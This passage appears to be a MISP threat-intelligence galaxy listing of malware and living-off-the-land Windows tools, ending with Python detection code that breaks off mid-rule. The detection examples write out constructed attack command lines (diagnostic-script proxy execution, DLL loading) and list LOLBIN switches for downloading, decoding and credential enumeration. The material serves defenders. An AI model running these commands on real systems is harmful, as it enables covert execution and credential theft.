Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1043 |
source | MITRE |
type | ['malware'] |
Cdb
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Resources: * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html * https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options * https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda * https://mrd0x.com/the-power-of-cdb-debugging-tool/ * https://twitter.com/nas_bench/status/1534957360032120833
Detection: * Sigma: proc_creation_win_lolbin_cdb.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Cdb.exe - LOLBAS Project]
Internal MISP references
UUID d9ea2696-7c47-44cd-8784-9aeef5e149ea
which can be used as unique global reference for Cdb
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5208 |
source | Tidal Cyber |
tags | ['4479b9e9-d912-451a-9ad5-08b3d922422d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CertOC
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for installing certificates
Author: Ensar Samil
Paths: * c:\windows\system32\certoc.exe * c:\windows\syswow64\certoc.exe
Resources: * https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 * https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
Detection: * Sigma: proc_creation_win_certoc_load_dll.yml * IOC: Process creation with given parameter * IOC: Unsigned DLL load via certoc.exe * IOC: Network connection via certoc.exe[CertOC.exe - LOLBAS Project]
Internal MISP references
UUID 34e1c197-ac43-4634-9a0d-9148c748f774
which can be used as unique global reference for CertOC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5087 |
source | Tidal Cyber |
tags | ['fb909648-ee44-4871-abe6-82c909c4d677', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CertReq
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for requesting and managing certificates
Author: David Middlehurst
Paths: * C:\Windows\System32\certreq.exe * C:\Windows\SysWOW64\certreq.exe
Resources: * https://dtm.uk/certreq
Detection: * Sigma: proc_creation_win_lolbin_susp_certreq_download.yml * IOC: certreq creates new files * IOC: certreq makes POST requests[CertReq.exe - LOLBAS Project]
Internal MISP references
UUID 43050f80-ce28-49e3-aac6-cb3f4a07f4b4
which can be used as unique global reference for CertReq
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5088 |
source | Tidal Cyber |
tags | ['35a798a2-eaab-48a3-9ee7-5538f36a4172', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
certutil
certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [TechNet Certutil]
Internal MISP references
UUID 2fe21578-ee31-4ee8-b6ab-b5f76f97d043
which can be used as unique global reference for certutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0160 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '412da5b4-fb41-40fc-a29a-78dc9119aa75', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Chaes
Chaes is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. Chaes was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.[Cybereason Chaes Nov 2020]
Internal MISP references
UUID 0c8efcd0-bfdf-4771-8754-18aac836c359
which can be used as unique global reference for Chaes
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0631 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Chaos
Chaos is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. [Chaos Stolen Backdoor]
Internal MISP references
UUID 92c88765-6b12-42cd-b1d7-f6a65b2236e2
which can be used as unique global reference for Chaos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0220 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
CharmPower
CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.[Check Point APT35 CharmPower January 2022]
Internal MISP references
UUID b1e3b56f-2e83-4cab-a1c1-16999009d056
which can be used as unique global reference for CharmPower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0674 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ChChes
ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [Palo Alto menuPass Feb 2017] [JPCERT ChChes Feb 2017] [PWC Cloud Hopper Technical Annex April 2017]
Internal MISP references
UUID 3f2283ef-67c2-49a3-98ac-1aa9f0499361
which can be used as unique global reference for ChChes
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0144 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cheerscrypt
Cheerscrypt is a ransomware that was developed by Cinnamon Tempest and has been used in attacks against ESXi and Windows environments since at least 2022. Cheerscrypt was derived from the leaked Babuk source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from Babuk.[Sygnia Emperor Dragonfly October 2022][Trend Micro Cheerscrypt May 2022]
Internal MISP references
UUID 6475bc8c-b95d-5cb3-92f0-aa7e2f18859a
which can be used as unique global reference for Cheerscrypt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1096 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cherry Picker
Cherry Picker is a point of sale (PoS) memory scraper. [Trustwave Cherry Picker]
Internal MISP references
UUID 2fd6f564-918e-4ee7-920a-2b4be858d11a
which can be used as unique global reference for Cherry Picker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0107 |
source | MITRE |
type | ['malware'] |
China Chopper
China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.[Lee 2013] It has been used by several threat groups.[Dell TG-3390][FireEye Periscope March 2018][CISA AA21-200A APT40 July 2021][Rapid7 HAFNIUM Mar 2021]
Internal MISP references
UUID 723c5ab7-23ca-46f2-83bb-f1d1e550122c
which can be used as unique global reference for China Chopper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0020 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Chinoxy
Chinoxy is a backdoor that has been used since at least November 2018, during the FunnyDream campaign, to gain persistence and drop additional payloads. According to security researchers, Chinoxy has been used by Chinese-speaking threat actors.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID 7c36563a-9143-4766-8aef-4e1787e18d8c
which can be used as unique global reference for Chinoxy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1041 |
source | MITRE |
type | ['malware'] |
Chisel
Chisel is an open source tool that can be used for network tunneling.[U.S. CISA AvosLocker October 11 2023] According to its GitHub project page, "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".[GitHub Chisel] Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.[U.S. CISA AvosLocker October 11 2023][CISA AA20-259A Iran-Based Actor September 2020]
Internal MISP references
UUID bd2b2375-4f16-42b2-a862-959b5b41c2af
which can be used as unique global reference for Chisel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5063 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Chocolatey
Chocolatey is a command-line package manager for Microsoft Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 7a2b00ef-8a37-4901-bf0c-17da0ebf3d69
which can be used as unique global reference for Chocolatey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5028 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
CHOPSTICK
CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [FireEye APT28] [ESET Sednit Part 2] [FireEye APT28 January 2017] [DOJ GRU Indictment Jul 2018] It is tracked separately from the X-Agent for Android.
Internal MISP references
UUID 01c6c49a-f7c8-44cd-a377-4dfd358ffeba
which can be used as unique global reference for CHOPSTICK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0023 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Chrommme
Chrommme is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with Gelsemium malware.[ESET Gelsemium June 2021]
Internal MISP references
UUID df77ed2a-f135-4f00-9a5e-79b7a6a2ed14
which can be used as unique global reference for Chrommme
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0667 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Clambling
Clambling is a modular backdoor written in C++ that has been used by Threat Group-3390 since at least 2017.[Trend Micro DRBControl February 2020]
Internal MISP references
UUID 4bac93bd-7e58-4ddb-a205-d99597b9e65e
which can be used as unique global reference for Clambling
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0660 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CL_Invocation
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Aero diagnostics script
Author: Oddvar Moe
Paths: * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
Resources:
Detection: * Sigma: proc_creation_win_lolbin_cl_invocation.yml * Sigma: posh_ps_cl_invocation_lolscript.yml[CL_Invocation.ps1 - LOLBAS Project]
Internal MISP references
UUID 4bc36e22-6529-4a4a-a5d2-461f3925c5f3
which can be used as unique global reference for CL_Invocation
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5257 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CL_LoadAssembly
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Paths: * C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Resources: * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Detection: * Sigma: proc_creation_win_lolbas_cl_loadassembly.yml[CL_LoadAssembly.ps1 - LOLBAS Project]
Internal MISP references
UUID cb950179-334d-4bd9-9cfb-87b09d279a3b
which can be used as unique global reference for CL_LoadAssembly
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5255 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CL_Mutexverifiers
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Proxy execution with CL_Mutexverifiers.ps1
Author: Oddvar Moe
Paths: * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
Resources: * https://twitter.com/pabraeken/status/995111125447577600
Detection: * Sigma: proc_creation_win_lolbin_cl_mutexverifiers.yml[CL_Mutexverifiers.ps1 - LOLBAS Project]
Internal MISP references
UUID 3c63792a-1184-416e-aa9b-18da72e88327
which can be used as unique global reference for CL_Mutexverifiers
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5256 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
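The three CL_*.ps1 entries above (CL_Invocation, CL_LoadAssembly and CL_Mutexverifiers) are abused the same way: a signed Windows diagnostic script is dot-sourced or imported and one of the functions it defines is then driven with attacker-chosen arguments, so that the executable, assembly or script runs under the cover of a Microsoft script. The detection references for them point at PowerShell script block logging, so the added example below (written for this page, not code from the LOLBAS project or Tidal Cyber) applies that idea to constructed Event ID 4104-style records. It assumes the function names SyncInvoke, LoadAssemblyFromPath and runAfterCancelProcess as exported by the respective scripts, treats sdiagnhost.exe (the Scripted Diagnostics host that normally runs troubleshooting packs) as the expected caller, and uses a `host_process` field that a real pipeline would have to join in from the process that hosted the engine; all sample records are constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ScriptBlockEvent:
    host_process: str  # image of the process hosting the PowerShell engine (assumed joined in)
    script_text: str   # ScriptBlockText as logged by PowerShell Event ID 4104


@dataclass(frozen=True)
class Finding:
    scripts: tuple     # diagnostic scripts referenced or invoked
    host: str
    verdict: str       # "expected", "suspicious-load" or "proxy-execution"


# Diagnostic scripts from the CL_Invocation, CL_LoadAssembly and CL_Mutexverifiers
# entries, each paired with the function it defines that the write-ups abuse.
# Assumption: the function names are stable across Windows builds.
DIAG_SCRIPTS = {
    "cl_invocation.ps1": "syncinvoke",
    "cl_loadassembly.ps1": "loadassemblyfrompath",
    "cl_mutexverifiers.ps1": "runaftercancelprocess",
}
# Assumption: troubleshooting packs run these scripts under the Scripted Diagnostics
# host, so that host is treated as the expected caller; anything else is ad hoc use.
EXPECTED_HOST = "sdiagnhost.exe"
SCRIPT_REF = re.compile(r"cl_\w+\.ps1")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ScriptBlockEvent) -> Optional[Finding]:
    """Classify one script block; None when no diagnostic script is involved."""
    text = ev.script_text.lower()
    # Scripts loaded by path (dot-source, Import-Module, & ...) that are on our list
    refs = set(SCRIPT_REF.findall(text)) & set(DIAG_SCRIPTS)
    # Exported functions invoked, whether or not the load is in the same block
    calls = {s for s, fn in DIAG_SCRIPTS.items() if re.search(rf"\b{fn}\b", text)}
    if not refs and not calls:
        return None
    host = _basename(ev.host_process)
    if host == EXPECTED_HOST:
        verdict = "expected"          # diagnostic pack running under its normal host
    elif calls:
        verdict = "proxy-execution"   # exported function driven from an ad hoc host
    else:
        verdict = "suspicious-load"   # script loaded outside a diagnostic session
    return Finding(tuple(sorted(refs | calls)), host, verdict)


def demo_events():
    # Constructed 4104-style records for this example; not real telemetry.
    PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    DIAG = r"C:\Windows\diagnostics\system"
    return [
        ScriptBlockEvent(PS, rf". {DIAG}\AERO\CL_Invocation.ps1; SyncInvoke C:\Users\Public\stage2.exe"),
        ScriptBlockEvent(PS, rf"Set-Location {DIAG}\Audio; Import-Module .\CL_LoadAssembly.ps1; "
                             r"LoadAssemblyFromPath ..\..\..\..\Users\Public\fun.dll; [fun.class]::Go()"),
        ScriptBlockEvent(PS, rf". {DIAG}\Video\CL_Mutexverifiers.ps1; runAfterCancelProcess C:\Users\Public\calc.ps1"),
        ScriptBlockEvent(r"C:\Windows\System32\sdiagnhost.exe", rf". {DIAG}\WindowsUpdate\CL_Invocation.ps1"),
        ScriptBlockEvent(PS, rf"Get-ChildItem {DIAG}"),
        ScriptBlockEvent(PS, rf". {DIAG}\Audio\CL_LoadAssembly.ps1"),
    ]


def run_demo():
    """Verdict per constructed record, in order (None = no finding)."""
    return [f.verdict if f else None for f in map(analyze, demo_events())]


if __name__ == "__main__":
    for ev, verdict in zip(demo_events(), run_demo()):
        print(f"{verdict!s:16} {_basename(ev.host_process):16} {ev.script_text[:70]}")
```

Matching on the exported function name as well as the script path is deliberate: the load and the call can arrive in separate script blocks, and a caller that has already dot-sourced the script in an earlier block still has to name the function. The host exclusion is a tuning choice, not a safety proof; an environment that never runs troubleshooting packs can drop it and alert on every hit.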
Clop
Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.[Mcafee Clop Aug 2019][Cybereason Clop Dec 2020][Unit42 Clop April 2021]
Internal MISP references
UUID 5321aa75-924c-47ae-b97a-b36f023abf2a
which can be used as unique global reference for Clop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0611 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', '562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b15c16f7-b8c7-4962-9acc-a98a39f87b69', 'b18b5401-d88d-4f28-8f50-a884a5e58349', 'ac862a66-a4ec-4285-9a21-b63576a5867d', '5ab5f811-5c7e-4f77-ae90-59d3beb93346', '1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0', 'e401022a-36ac-486d-8503-dd531410a927', '8a77c410-bed9-4376-87bf-5ac84fbc2c9d', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CloudChat Infostealer
CloudChat Infostealer is an information-stealing malware designed to harvest passwords, cookies, and other sensitive information from macOS systems.[Kandji 4 8 2024]
Internal MISP references
UUID 7a57e81b-2453-4aaf-94ad-c007bd7105a2
which can be used as unique global reference for CloudChat Infostealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5316 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
CloudDuke
CloudDuke is malware that was used by APT29 in 2015. [F-Secure The Dukes] [Securelist Minidionis July 2015]
Internal MISP references
UUID b3dd424b-ee96-449c-aa52-abbc7d4dfb86
which can be used as unique global reference for CloudDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0054 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
cmd
cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. [TechNet Cmd]
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir [TechNet Dir]), deleting files (e.g., del [TechNet Del]), and copying files (e.g., copy [TechNet Copy]).
Internal MISP references
UUID 98d89476-63ec-4baf-b2b3-86c52170f5d8
which can be used as unique global reference for cmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0106 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'a968c9f3-c190-488f-bacc-92e8f1ce295c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cmdkey
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Creates, lists, and deletes stored user names and passwords or credentials.
Author: Oddvar Moe
Paths: * C:\Windows\System32\cmdkey.exe * C:\Windows\SysWOW64\cmdkey.exe
Resources: * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Detection: * Sigma: proc_creation_win_cmdkey_recon.yml[Cmdkey.exe - LOLBAS Project]
Internal MISP references
UUID da252f67-2d4e-419f-b493-d4a1d024a01c
which can be used as unique global reference for Cmdkey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5089 |
source | Tidal Cyber |
tags | ['96bff827-e51f-47de-bde6-d2eec0f99767', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
cmdl32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Connection Manager Auto-Download
Author: Elliot Killick
Paths: * C:\Windows\System32\cmdl32.exe * C:\Windows\SysWOW64\cmdl32.exe
Resources: * https://github.com/LOLBAS-Project/LOLBAS/pull/151 * https://twitter.com/ElliotKillick/status/1455897435063074824 * https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/
Detection: * Sigma: proc_creation_win_lolbin_cmdl32.yml * IOC: Reports of downloading from suspicious URLs in %TMP%\config.log * IOC: Useragent Microsoft(R) Connection Manager Vpn File Update[cmdl32.exe - LOLBAS Project]
Internal MISP references
UUID 44a523a8-9ed6-4f01-9a53-0e8ea1e15b51
which can be used as unique global reference for cmdl32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5090 |
source | Tidal Cyber |
tags | ['4c8f8830-0b2c-4c79-b1db-8659ede492f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Cmstp
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Installs or removes a Connection Manager service profile.
Author: Oddvar Moe
Paths: * C:\Windows\System32\cmstp.exe * C:\Windows\SysWOW64\cmstp.exe
Resources: * https://twitter.com/NickTyrer/status/958450014111633408 * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Detection: * Sigma: proc_creation_win_cmstp_execution_by_creation.yml * Sigma: proc_creation_win_uac_bypass_cmstp.yml * Splunk: cmlua_or_cmstplua_uac_bypass.yml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Elastic: defense_evasion_unusual_process_network_connection.toml * IOC: Execution of cmstp.exe without a VPN use case is suspicious * IOC: DotNet CLR libraries loaded into cmstp.exe * IOC: DotNet CLR Usage Log - cmstp.exe.log[Cmstp.exe - LOLBAS Project]
Internal MISP references
UUID 6f848e15-5234-4445-9a05-2949e4c57f0b
which can be used as unique global reference for Cmstp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5091 |
source | Tidal Cyber |
tags | ['65938118-2f00-48a1-856e-d1a75a08e3c6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
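Several entries above describe the same pattern: a signed Windows binary (certutil, CertReq, CertOC, Cdb, Cmdkey, cmdl32, Cmstp) is launched with a switch combination that turns it into a downloader, a decoder, a DLL loader, a credential-enumeration tool or a script host, and the listed detections key on process creation. The added example below (written for this page, not a rule shipped by LOLBAS, Sigma, Elastic or Tidal Cyber) encodes those switch combinations as rules and runs them over constructed process-creation records of the shape a parsed Sysmon Event ID 1 or Security 4688 event has. The switches themselves (-urlcache, -decode, -Post -config, -LoadDLL, -cf, /list, /vpn /lan, /ni /s) are the binaries' own options; treating each combination as an indicator is this example's reading of the cited write-ups. The sample command lines, paths and RFC 5737 addresses are constructed.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class ProcEvent:
    image: str         # full path of the created process
    cmdline: str       # command line as logged
    parent_image: str  # image of the parent process


@dataclass(frozen=True)
class Finding:
    binary: str
    technique: str
    event: ProcEvent


# http(s) URL or UNC path anywhere on the command line
_REMOTE = re.compile(r"https?://|\\\\[^\s\\]+\\", re.I)


def has_remote_source(cmdline: str) -> bool:
    return bool(_REMOTE.search(cmdline))


# (image basename, technique, predicate over (lower-cased tokens, lower-cased command line)).
# Switch combinations follow the LOLBAS write-ups cited in the entries above; the
# mapping to an indicator is this example's, not a published rule.
RULES: List[tuple] = [
    ("certutil.exe", "file fetch from a URL (-urlcache / -verifyctl)",
     lambda t, cl: bool(t & {"-urlcache", "-verifyctl"}) and has_remote_source(cl)),
    ("certutil.exe", "payload decode (-decode / -decodehex)",
     lambda t, cl: bool(t & {"-decode", "-decodehex"})),
    ("certreq.exe", "HTTP POST of a local file (-post -config <url> <file>)",
     lambda t, cl: {"-post", "-config"} <= t and has_remote_source(cl)),
    ("certoc.exe", "DLL load (-loaddll <dll>)",
     lambda t, cl: "-loaddll" in t),
    ("cdb.exe", "debugger driven by a script or command (-cf <script> / -c <cmd>)",
     lambda t, cl: bool(t & {"-cf", "-c"})),
    ("cmdkey.exe", "stored-credential enumeration (/list)",
     lambda t, cl: bool(t & {"/list", "/l"})),
    ("cmdl32.exe", "Connection Manager auto-download (/vpn /lan <profile>)",
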